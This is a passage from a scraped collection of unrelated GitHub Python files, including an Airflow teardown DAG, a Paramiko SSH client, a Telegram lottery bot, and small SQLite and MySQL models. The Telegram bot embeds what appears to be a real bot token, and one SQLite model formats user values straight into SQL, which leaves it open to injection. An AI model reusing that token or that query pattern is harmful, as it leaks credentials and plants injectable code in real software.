np.sum(reshape((Duv[:, 1] - 1j * Duv[:, 0]) * z[flatface], (nf, 3), order='F'), axis=1)\n Dzz = np.sum(reshape((Duv[:, 1] + 1j * Duv[:, 0]) * z[flatface], (nf, 3), order='F'), axis=1)\n mu = Dcz / Dzz\n\n if vertex.shape[1] == 3:\n du = np.zeros((nf, 3))\n flatface = np.concatenate((face[:, 0], face[:, 1], face[:, 2]))\n du[:, 0] = np.sum(reshape(Duv[:, 1] * vertex[flatface, 0], (nf, 3), order='F'), axis=1)\n du[:, 1] = np.sum(reshape(Duv[:, 1] * vertex[flatface, 1], (nf, 3), order='F'), axis=1)\n du[:, 2] = np.sum(reshape(Duv[:, 1] * vertex[flatface, 2], (nf, 3), order='F'), axis=1)\n dv = np.zeros((nf, 3))\n dv[:, 0] = np.sum(reshape(Duv[:, 0] * vertex[flatface, 0], (nf, 3), order='F'), axis=1)\n dv[:, 1] = np.sum(reshape(Duv[:, 0] * vertex[flatface, 1], (nf, 3), order='F'), axis=1)\n dv[:, 2] = np.sum(reshape(Duv[:, 0] * vertex[flatface, 2], (nf, 3), order='F'), axis=1)\n\n E = np.sum(du * du, axis=1)\n G = np.sum(dv * dv, axis=1)\n F = -np.sum(du * dv, axis=1)\n mu = (E - G + 2j * F) / (E + G + 2 * np.sqrt(E * G - np.power(F,2)))\n\n if vertex.shape[1] != 2 and vertex.shape[1] != 3:\n raise NameError('Dimension of target mesh must be 3 or 2.')\n\n mu[np.abs(mu) > 1e3] = 1e3\n mu[np.isnan(mu)] = 1\n\n return mu\n","repo_name":"Project1HY/Ramp","sub_path":"shape_completion-main/src/core/geom/todo/CanonicalCoordinateGeometryLearn/algebra/compute_bc.py","file_name":"compute_bc.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"28287724452","text":"# Não consegui fazer esse exercicios. Tenho que APRENDER!!!\n\nprint('Gerador de PA')\nprint('-=' * 10)\n\nprimeiro_termo = int(input('Primeiro termo: '))\nrazao = int(input('Razão: '))\n\ntermo = primeiro_termo\ncontador = 1\n\nwhile contador <= 10:\n print(f'{termo} -> ', end='')\n termo = termo + razao\n contador = contador + 1\n\nprint('FIM')\n","repo_name":"saulojustiniano1/cursoemvideo-exercicios","sub_path":"python/ex061.py","file_name":"ex061.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1049048147","text":"from __future__ import print_function\n\nfrom airflow import models\nfrom airflow.operators import bash_operator\nfrom airflow.utils import timezone\nfrom datetime import datetime, timedelta\nfrom airflow.providers.google.cloud.operators.datafusion import (\n CloudDataFusionCreateInstanceOperator,\n CloudDataFusionCreatePipelineOperator,\n CloudDataFusionDeleteInstanceOperator,\n CloudDataFusionDeletePipelineOperator,\n CloudDataFusionGetInstanceOperator,\n CloudDataFusionListPipelinesOperator,\n CloudDataFusionRestartInstanceOperator,\n CloudDataFusionStartPipelineOperator,\n CloudDataFusionStopPipelineOperator,\n CloudDataFusionUpdateInstanceOperator,\n)\n\n\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n#\n# !! (DO NOT MODIFY) !!\n#\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# !! WARNING !! Modifying the DAG name invalidates the DAG composer configuration\ndagIdentifier = \"datafusionInstanceDestroy\"\n\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n#\n# -- CALCULATED GLOBAL VARIABLES --\n#\n# !! (DO NOT MODIFY) !!\n#\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n\n## -- -- -- -- -- -- -- -- -- -- -- --\n## ws2 dag generic configuration\n## -- -- -- -- -- -- -- -- -- -- -- --\ndagsConfiguration = models.Variable.get(\"main\", deserialize_json=True)\ndatafusionInstanceName = dagsConfiguration[\"datafusionInstanceName\"]\ndatafusionInstanceType = dagsConfiguration[\"datafusionInstanceType\"]\ndatafusionLocation = dagsConfiguration[\"datafusionLocation\"]\ndataprocServiceAccount = dagsConfiguration[\"dataprocServiceAccount\"]\ndatafusionPipelineName = dagsConfiguration[\"datafusionPipelineName\"]\n## -- -- -- -- -- -- -- -- -- -- -- --\n## dag specific configuration\n## -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n#\n# -- TEMPLATES AND CONSTANTS --\n#\n# !! (DO NOT MODIFY) !!\n#\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n#\n# -- CUSTOMIZE --\n#\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n\n# -- -- -- -- -- -- -- -- --\n# default dag arguments\n# -- -- -- -- -- -- -- -- --\ndefault_dag_args = {\n 'owner': 'ws2',\n 'start_date': datetime(2020, 1, 1),\n 'depends_on_past': False,\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 5,\n 'retry_delay': timedelta(seconds=30)\n}\n\nwith models.DAG(\n dagIdentifier,\n schedule_interval='0 20 * * *',\n #schedule_interval=None,\n catchup=False,\n default_args=default_dag_args) as dag:\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n #\n # -- OPERATIONS --\n #\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n\n delete_pipeline = CloudDataFusionDeletePipelineOperator(\n location=datafusionLocation,\n pipeline_name=datafusionPipelineName,\n instance_name=datafusionInstanceName,\n task_id=\"delete_pipeline_edm\",\n )\n\n\n delete_instance = CloudDataFusionDeleteInstanceOperator(\n location=datafusionLocation,\n instance_name=datafusionInstanceName,\n task_id=\"delete_instance\"\n )\n\n\n\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n #\n # -- OPERATION DEPENDENCIES --\n #\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n delete_pipeline >> delete_instance","repo_name":"sscosta/datafusion-on-demand","sub_path":"datafusionInstanceDestroy.py","file_name":"datafusionInstanceDestroy.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1406506180","text":"from chatterbot import ChatBot\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\n\n# Create a new chat bot named Charlie\nchatbot = ChatBot('Omar',\n storage_adapter='chatterbot.storage.SQLStorageAdapter',\n logic_adapters=[\n {\n 'import_path': 'chatterbot.logic.BestMatch'\n },\n {\n 'import_path': 'chatterbot.logic.LowConfidenceAdapter',\n 'threshold': 0.65,\n 'default_response': 'I am sorry, but I do not understand.'\n }\n ],\n filters=[\"chatterbot.filters.RepetitiveResponseFilter\"],\n input_adapter='chatterbot.input.TerminalAdapter',\n output_adapter='chatterbot.output.TerminalAdapter'\n )\n\n# Create a new trainer for the chatbot\ntrainer = ChatterBotCorpusTrainer(chatbot)\n\n# Now let us train our bot with multiple corpus\ntrainer.train(\"chatterbot.corpus.arabic.greetings\",\n \"chatterbot.corpus.arabic.conversations\")\n\n","repo_name":"AymanRabaya20/Chat_Bot","sub_path":"demo_moudle.py","file_name":"demo_moudle.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21936534997","text":"import cv2\nimport sys\n\nframes_list = sys.argv[1]\noriginal_video_path = sys.argv[2]\noutput_video_path = sys.argv[3]\n\nwidth = int(sys.argv[4])\nheight = int(sys.argv[5])\n\nwith open(frames_list, 'r') as f:\n frames = f.readlines()\n\nog_vid = cv2.VideoCapture(original_video_path)\nselected_vid = cv2.VideoWriter()\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\nselected_vid.open(output_video_path, fourcc, 30, (width, height))\n\nif not selected_vid.isOpened():\n print(\"Error opening output video\")\n sys.exit(1)\n\n#for frame_num in frames:\n# og_vid.set(cv2.CAP_PROP_POS_FRAMES, int(frame_num))\n ret, frame = og_vid.read()\n# selected_vid.write(frame)\n\nselected_vid.release()\n","repo_name":"uwdb/vss","sub_path":"cc/alpr/saveSubsetOfFrames.py","file_name":"saveSubsetOfFrames.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"39771329068","text":"import sqlite3\n\nconn = sqlite3.connect('rest_server.db')\n\n\nclass Participant:\n def __init__(self):\n try:\n conn.execute('''CREATE TABLE WORKSHOP\n (ID INT PRIMARY KEY NOT NULL,\n NAME TEXT NOT NULL,\n AGE INT NOT NULL,\n CITY CHAR(50));''')\n except Exception as e:\n print('Table creation error')\n\n def create_participant(self, name, age, city):\n last_id = conn.execute(\"SELECT MAX(id) from WORKSHOP\").fetchone()[0]\n last_id = 0 if last_id is None else last_id\n conn.execute(\"INSERT INTO WORKSHOP (ID,NAME,AGE,CITY)\"\n \"VALUES ({}, '{}', {}, '{}')\".format(last_id + 1, name, age, city))\n\n conn.commit()\n\n def list_participants(self):\n\n participants = []\n cursor = conn.execute(\"SELECT id, name, city from WORKSHOP\")\n for row in cursor:\n participants.append({\"id\": row[0],\n \"name\": row[1],\n \"city\": row[2]})\n return participants\n","repo_name":"koshikraj/PythonLectures","sub_path":"scripts/webapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74192486642","text":"from re import U\r\nfrom app.db import db\r\nfrom mysql.connector import IntegrityError\r\n\r\nclass AccountModel:\r\n def get_accounts_by_box_owner_and_box_name(self, box_owner,box_name):\r\n cursor = db.cursor(dictionary=True)\r\n cursor.execute(f\"SELECT * FROM accounts WHERE box_owner = %s AND box_name = %s\",[box_owner,box_name])\r\n accounts = cursor.fetchall()\r\n cursor.close()\r\n return accounts\r\n\r\n \r\n\r\n def get_account(self,box_owner,box_name,account_id):\r\n cursor = db.cursor(dictionary=True)\r\n cursor.execute(f\"SELECT * FROM accounts WHERE box_owner = %s AND box_name = %s AND account_id = %s\",\r\n [box_owner,box_name,account_id])\r\n account = cursor.fetchall()\r\n cursor.close()\r\n return account[0] if len(account) > 0 else None\r\n\r\n\r\n def create_account(self,box_owner,box_name,account_data):\r\n try:\r\n \r\n cursor = db.cursor(dictionary=True)\r\n\r\n cursor.execute(\"\"\"\r\n SELECT MAX(account_id) INTO @last_id \r\n FROM accounts \r\n WHERE accounts.box_owner = %s AND accounts.box_name = %s\r\n \"\"\",[box_owner,box_name])\r\n \r\n\r\n cursor.execute(\"\"\"\r\n INSERT INTO accounts (box_owner,box_name,account_id,account_description,account_user,account_password)\r\n VALUES (%s,%s,@last_id + 1,%s,%s,%s)\r\n \"\"\",[box_owner,box_name,account_data[\"description\"],account_data[\"user\"], account_data[\"password\"]])\r\n\r\n db.commit()\r\n cursor.close()\r\n return {\"created_id\": cursor.lastrowid}\r\n except IntegrityError:\r\n return \"duplicated\"\r\n \r\n\r\n\r\n def delete_account(self,box_owner,box_name,account_id):\r\n cursor = db.cursor(dictionary=True)\r\n cursor.execute(f\"DELETE FROM accounts WHERE box_owner = %s AND box_name = %s AND account_id = %s\", \r\n [box_owner,box_name,account_id])\r\n db.commit()\r\n cursor.close()\r\n return {\"deleted_id\": cursor.lastrowid} ","repo_name":"AlanHoltz/passguard-rest-api","sub_path":"app/models/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37005301670","text":"#!/usr/bin/env python3\nfrom os import system\nfrom paramiko import SSHClient, AutoAddPolicy, RSAKey\nfrom paramiko.auth_handler import AuthenticationException, SSHException\nfrom scp import SCPClient, SCPException\nfrom log import logger\n\n\nclass RemoteClient:\n \"\"\"Client to interact with a remote host via SSH & SCP.\n\n Code from https://github.com/hackersandslackers/paramiko-tutorial\n\n \"\"\"\n def __init__(self, host, user, ssh_key_filepath, remote_path):\n self.host = host\n self.user = user\n self.ssh_key_filepath = ssh_key_filepath\n self.remote_path = remote_path\n self.client = None\n self.scp = None\n self.conn = None\n # self._upload_ssh_key(self)\n\n @logger.catch\n def __get_ssh_key(self):\n \"\"\"Fetch locally stored SSH key.\"\"\"\n try:\n self.ssh_key = RSAKey.from_private_key_file(self.ssh_key_filepath)\n logger.info(f'Found SSH key at self {self.ssh_key_filepath}')\n except SSHException as error:\n logger.error(error)\n return self.ssh_key\n\n @logger.catch\n def __upload_ssh_key(self):\n try:\n system(f'ssh-copy-id -i {self.ssh_key_filepath} {self.user}@{self.host}>/dev/null 2>&1')\n system(f'ssh-copy-id -i {self.ssh_key_filepath}.pub {self.user}@{self.host}>/dev/null 2>&1')\n logger.info(f'{self.ssh_key_filepath} uploaded to {self.host}')\n except FileNotFoundError as error:\n logger.error(error)\n\n def __connect(self):\n \"\"\"Open a connection to the remote host.\"\"\"\n if self.conn is None:\n try:\n self.client = SSHClient()\n self.client.load_system_host_keys()\n self.client.set_missing_host_key_policy(AutoAddPolicy())\n self.client.connect(\n self.host,\n username=self.user,\n key_filename=self.ssh_key_filepath,\n look_for_keys=True,\n timeout=5000\n )\n self.scp = SCPClient(self.client.get_transport())\n except AuthenticationException as error:\n logger.error(f'Authentication failed: did you remember to create a key? {error}')\n raise error\n return self.client\n\n def disconnect(self):\n \"\"\"Close the connections\"\"\"\n if self.client:\n self.client.close()\n if self.scp:\n self.scp.close()\n\n @logger.catch\n def bulk_upload(self, file_list):\n \"\"\"Upload mutiple files to a remote directory\n\n :param file_list: List of local files to be uploaded.\n :type file_list: List[str]\n \"\"\"\n self.conn = self.__connect()\n uploads = [self.__upload_single_file(fn) for fn in file_list]\n logger.info(f'Finished uploading {len(uploads)} files to {self.remote_path} on {self.host}')\n\n def __upload_single_file(self, fn):\n \"\"\"Upload a single file to a remote directory\"\"\"\n upload = None\n try:\n self.scp.put(\n fn,\n recursive=True,\n remote_path=self.remote_path\n )\n upload = fn\n except SCPException as error:\n logger.error(error)\n raise error\n finally:\n logger.info(f'Uploaded {fn} to {self.remote_path}')\n return upload\n\n def download_file(self, file):\n \"\"\"Download file from remote host.\"\"\"\n self.conn = self.__connect()\n self.scp.get(file)\n\n @logger.catch\n def execute_commands(self, commands):\n \"\"\"Execute multiple commands in succession.\n\n :param commands: List of unix commands as strings.\n :type commands: List[str]\n \"\"\"\n self.conn = self.__connect()\n for cmd in commands:\n stdin, stdout, stderr = self.client.exec_command(cmd)\n stdout.channel.recv_exit_status()\n response = stdout.readlines()\n for line in response:\n logger.info(f'INPUT: {cmd} | OUTPUT: {line}')\n\n @logger.catch\n def execute_single_command(self, command):\n \"\"\"Execute a command and return the result from STDOUT\n\n :param command: A unix command as a string\n :type command: str\n \"\"\"\n self.conn = self.__connect()\n stdin, stdout, stderr = self.client.exec_command(command)\n stdout.channel.recv_exit_status()\n errors = stderr.readlines()\n if len(errors) > 0:\n error_msg = \"\\n\".join(errors)\n logger.error(f\"Command failed: {error_msg}\")\n raise Exception(\"SSH Remote Command failed, see log\")\n response = stdout.readlines()\n return response\n","repo_name":"jfriant/backup-byssh","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27952733519","text":"import streamlit as st\nimport style\n\ndef contact_main():\n st.markdown(\"\"\" \"\"\", unsafe_allow_html=True)\n st.markdown('

Contact Form

', unsafe_allow_html=True)\n with st.form(key='columns_in_form2',clear_on_submit=True): #set clear_on_submit=True so that the form will be reset/cleared once it's submitted\n #st.write('Please help us improve!')\n Name=st.text_input(label='Your Name:') #Collect user feedback\n Email=st.text_input(label='Your Email to Contact:') #Collect user feedback\n Message=st.text_area(label='Your Feedback or Query:') #Collect user feedback\n submitted = st.form_submit_button('Submit')\n if submitted:\n st.write('Thanks for your contacting us. We will respond to your questions or inquiries as soon as possible!')\n \n \n\n\ndef contact_main1():\n st.markdown(\"\"\" \"\"\", unsafe_allow_html=True)\n st.markdown('

Contact Form

', unsafe_allow_html=True)\n \n contact_form = \"\"\"\n
\n \n \n \n \n \n
\n \"\"\"\n \n st.markdown(contact_form, unsafe_allow_html=True)\n \n # Use Local CSS File\n def local_css(file_name):\n with open(file_name) as f:\n st.markdown(f\"\", unsafe_allow_html=True)\n\n\n local_css(\"style/style.css\")","repo_name":"singhsud2157/project_capstone","sub_path":"helper/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40611026022","text":"import time\nfrom datetime import datetime\nimport logging\nimport simplejson as json\n\n###\n\nL = logging.getLogger(__name__)\n\n\n###\n\n# strg = 'user input'\nt0_publish = time.time()\ninfo = {\n\t\"id\": 1,\n\t\"store_enabled\": \"False\",\n\t\"timestamp\": time.time()\n}\nstrg = json.dumps(info)\nprint(strg)\nt1_publish = (time.time() - t0_publish) * 1000\nL.warning(('\\n[%s] Latency Dump (%.3f ms) \\n' % (datetime.now().strftime(\"%H:%M:%S\"), t1_publish)))\n# strg = str(time.time())\n\nt0_publish = time.time()\ni = int.from_bytes(strg.encode('utf-8'), byteorder='big')\nt1_publish = (time.time() - t0_publish) * 1000\nL.warning(('\\n[%s] Latency Encrypt (%.3f ms) \\n' % (datetime.now().strftime(\"%H:%M:%S\"), t1_publish)))\n\nt0_publish = time.time()\ns = int.to_bytes(i, length=len(strg), byteorder='big').decode('utf-8')\nt1_publish = (time.time() - t0_publish) * 1000\nL.warning(('\\n[%s] Latency Decrypt (%.3f ms) \\n' % (datetime.now().strftime(\"%H:%M:%S\"), t1_publish)))\n\nprint(\">>>> strg: \", strg)\nprint(\">>>> i: \", i)\nprint(\">>>> s: \", s)\n","repo_name":"ardihikaru/eagleeye","sub_path":"core-docker-images/misc/encrypt_decrypt/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"71953442481","text":"import logging\nimport traceback\nimport html\nimport json\nimport random\n\nfrom telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext\nimport requests\nimport re\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\ndef start(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Are you ready for some luck?\\n \\nUse /toto or /4d to generate your lottery numbers!\\n\\nClick /news for latest lottery updates or /sgpools to redirect to SGPools website!')\n\ndef help(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Use /toto or /4d to generate your lottery numbers!\\n\\nClick /news for latest lottery updates or /sgpools to redirect to SGPools website!')\n \ndef error_handler(update: Update, context: CallbackContext) -> None:\n logger.error(msg=\"Exception while handling an update:\", exc_info=context.error)\n tb_list = traceback.format_exception(None, context.error, context.error.__traceback__)\n tb_string = ''.join(tb_list)\n message = (\n f'An exception was raised while handling an update\\n'\n f'
update = {html.escape(json.dumps(update.to_dict(), indent=2, ensure_ascii=False))}'\n        '
\\n\\n'\n f'
context.chat_data = {html.escape(str(context.chat_data))}
\\n\\n'\n f'
context.user_data = {html.escape(str(context.user_data))}
\\n\\n'\n f'
{html.escape(tb_string)}
'\n )\n \n \ndef toto(update: Update, context: CallbackContext) -> None:\n number = random.sample(range(1, 50), 6)\n no = str(number[0])\n for i in range(1, len(number)):\n no += ' ' + str(number[i])\n chat_id = update.message.chat_id\n update.message.reply_text(\"Here are your 6 lucky TOTO numbers!\\n \\n\" + no)\n return\n\ndef fourd(update: Update, context: CallbackContext) -> None:\n number = random.sample(range(0, 10), 4)\n no = ''\n for i in number:\n no += str(i)\n chat_id = update.message.chat_id\n update.message.reply_text(\"Huat ah!\\n \\n\" + no)\n return\n\ndef news(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Link to CNA Singapore Pools News:\\n\\nhttps://www.channelnewsasia.com/news/topic/singapore-pools\")\n return \n\ndef sgpools(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Link to Singapore Pools portal:\\n\\nhttps://www.singaporepools.com.sg/landing/en/Pages/index.html\")\n return \n \ndef main():\n updater = Updater('1593199777:AAHWnaJy7vCdHioKag86V3SPMzDMzt5kE8w', use_context=True)\n dp = updater.dispatcher\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(CommandHandler(\"help\", start))\n dp.add_handler(CommandHandler(\"toto\", toto))\n dp.add_handler(CommandHandler(\"4d\", fourd))\n dp.add_handler(CommandHandler(\"news\", news))\n dp.add_handler(CommandHandler(\"sgpools\", sgpools))\n dp.add_error_handler(error_handler)\n updater.start_polling()\n updater.idle()\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"yxchoong/telegram-lottery-bot","sub_path":"lottery.py","file_name":"lottery.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30619023786","text":"import logging\n\nfrom ming.odm import Mapper\nfrom pylons import app_globals as g\n\nfrom vulcanforge.virusscan.model import S3VirusScannableMixin\nfrom . import base\n\nLOG = logging.getLogger(__name__)\n\n\nclass ScanFiles(base.Command):\n min_args = 1\n max_args = 1\n usage = ''\n summary = 'Scan unscanned files'\n parser = base.Command.standard_parser(verbose=True)\n\n def command(self):\n self.basic_setup()\n\n for m in Mapper.all_mappers():\n if issubclass(m.mapped_class, S3VirusScannableMixin):\n instances = m.mapped_class.query.find({\n '$and': [\n {'$or': [\n {'virus_scan_status': {'$exists': False}},\n {'virus_scan_status': 'unscanned'}\n ]},\n {'$or': [\n {'deleted': {'$exists': False}},\n {'deleted': False}\n ]}\n ]\n })\n for instance in instances:\n instance.scan_for_virus.post(\n taskd_priority=g.clamav_task_priority)","repo_name":"vulcan-collaboration/vulcanforge","sub_path":"vulcanforge/command/virus_scan.py","file_name":"virus_scan.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"42066636283","text":"import Tkinter\nimport calendar\nimport time\nimport tkFont\nimport ttk\n\n\ndef sequence(*functions): # to run 2 or more functions on button click\n for function in functions:\n function()\n\n\ndef update(y, m, tx, curdate): # generate calendar with right colors\n calstr = calendar.month(y, m)\n tx.configure(state=Tkinter.NORMAL)\n tx.delete('0.0', Tkinter.END) # remove previous calendar\n tx.insert(Tkinter.INSERT, calstr)\n for i in range(2, 9):\n tx.tag_add(\"others\", '{}.0'.format(i), '{}.end'.format(i)) # tag days for coloring\n if len(tx.get('{}.0'.format(i), '{}.end'.format(i))) == 20:\n tx.tag_add(\"sun\", '{}.end-2c'.format(i), '{}.end'.format(i))\n tx.tag_config(\"sun\", foreground=\"#fb4622\")\n tx.tag_config(\"others\", foreground=\"#427eb5\")\n tx.tag_add(\"head\", '1.0', '1.end')\n if curdate[0] == y and curdate[1] == m:\n index = tx.search(str(curdate[2]), '2.0') # search for today's date\n tx.tag_add(\"cur\", index, '{}+2c'.format(index)) # highlight today's date\n tx.tag_config(\"cur\", background=\"blue\", foreground=\"white\")\n tx.tag_config(\"head\", font=segoe, foreground=\"#0d8241\", justify=Tkinter.CENTER)\n tx.configure(state=Tkinter.DISABLED) # make text view not editable\n\n\ntop = Tkinter.Tk()\ntop.title(\"Calendar\")\ntop.minsize(200, 200)\ntop.maxsize(250, 250)\nlogo = Tkinter.PhotoImage(file=\"Britalstar.gif\")\ntop.tk.call('wm', 'iconphoto', top._w, logo)\nsegoe = tkFont.Font(family='Segoe UI')\ncurtime = time.localtime()\nyear = Tkinter.StringVar()\nmonth = Tkinter.StringVar()\nyearInt = curtime[0]\nmonthInt = curtime[1]\ndateInt = curtime[2]\nHLayout = ttk.PanedWindow(top, orient=Tkinter.HORIZONTAL)\nctx = Tkinter.Text(top, padx=10, pady=10, bg=\"#f3e9ae\", relief=Tkinter.FLAT, height=9,\n width=20) # text view to passing to functions\n\n\ndef nextb(): # on click next button\n global monthInt, yearInt, ctx, curtime\n monthInt += 1\n if monthInt > 12:\n monthInt = monthInt % 12\n yearInt += 1\n update(yearInt, monthInt, ctx, curtime)\n\n\ndef prevb(): # on click previous button\n global monthInt, yearInt, ctx, curtime\n monthInt -= 1\n if monthInt < 1:\n monthInt = 12\n yearInt -= 1\n update(yearInt, monthInt, ctx, curtime)\n\n\ndef okcall(): # ok button click inside go to date window\n global monthInt, yearInt, ctx, curtime\n if (year.get().isdigit() and month.get().isdigit()) and (\n (0 < int(year.get()) < 10000) and (0 < int(month.get()) < 13)):\n yearInt = int(year.get())\n monthInt = int(month.get())\n update(yearInt, monthInt, ctx, curtime)\n\n\ndef gotod(): # go to date window creation\n newtop = Tkinter.Toplevel()\n newtop.title(\"Calendar\")\n newtop.maxsize(190, 190)\n newtop.focus_set()\n newtop.tk.call('wm', 'iconphoto', newtop._w, logo)\n HLayout = ttk.PanedWindow(newtop, orient=Tkinter.HORIZONTAL)\n HLayout2 = ttk.PanedWindow(newtop, orient=Tkinter.HORIZONTAL)\n yearText = ttk.Label(HLayout, text=\"Year :\")\n yearEdit = ttk.Entry(HLayout, textvariable=year)\n monthText = ttk.Label(HLayout2, text=\"Month:\")\n monthEdit = ttk.Entry(HLayout2, textvariable=month)\n okb = ttk.Button(newtop, text=\"Ok\", command=lambda: sequence(okcall, newtop.destroy))\n yearText.pack(side=Tkinter.LEFT)\n yearEdit.pack(side=Tkinter.RIGHT)\n monthText.pack(side=Tkinter.LEFT)\n monthEdit.pack(side=Tkinter.RIGHT)\n HLayout.pack()\n HLayout2.pack()\n okb.pack()\n newtop.mainloop()\n\n\ndef about_show(): # about window creation\n newtop = Tkinter.Toplevel()\n newtop.title(\"Calendar\")\n newtop.maxsize(190, 190)\n newtop.focus_set()\n newtop.tk.call('wm', 'iconphoto', newtop._w, logo)\n about = ttk.LabelFrame(newtop, text=\"About\")\n Tkinter.Label(about, text=\"Calendar 2.0\").pack()\n Tkinter.Label(about, image=logo, text=\"Developer: Britalstar\", compound=Tkinter.BOTTOM).pack()\n about.pack()\n newtop.mainloop()\n\n\nupdate(yearInt, monthInt, ctx, curtime) # for first run, generate calendar\nprev = ttk.Button(HLayout, text=\"<<\", command=prevb)\nnex = ttk.Button(HLayout, text=\">>\", command=nextb)\ngoto = ttk.Button(top, text=\"Goto\", command=gotod)\nmenubar = Tkinter.Menu(top, relief=Tkinter.FLAT)\nfilemenu = Tkinter.Menu(menubar, tearoff=0, relief=Tkinter.FLAT)\nhelpmenu = Tkinter.Menu(menubar, tearoff=0, relief=Tkinter.FLAT)\nfilemenu.add_command(label=\"Goto\", command=gotod)\nfilemenu.add_separator()\nfilemenu.add_command(label=\"Exit\", command=top.destroy)\nhelpmenu.add_command(label=\"About\", command=about_show)\nmenubar.add_cascade(label=\"File\", menu=filemenu)\nmenubar.add_cascade(label=\"Help\", menu=helpmenu)\ntop.config(menu=menubar)\nprev.pack(side=Tkinter.LEFT)\nnex.pack(side=Tkinter.RIGHT)\nctx.pack()\nHLayout.pack()\ngoto.pack()\ntop.mainloop()\n","repo_name":"RaghavaDhanya/Calendar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"72088711921","text":"import unittest\r\nimport binary_tree\r\nimport io\r\nimport sys\r\n\r\nclass Test(unittest.TestCase):\r\n tree = binary_tree.BinaryTree(70)\r\n list = [31,93,14, 73,94,23]\r\n for x in list:\r\n tree.insert(x)\r\n\r\n def test_1_(self):\r\n print(\"\\nRunning test1: find\")\r\n self.assertTrue(self.tree.find(94))\r\n self.assertFalse(self.tree.find(74))\r\n def 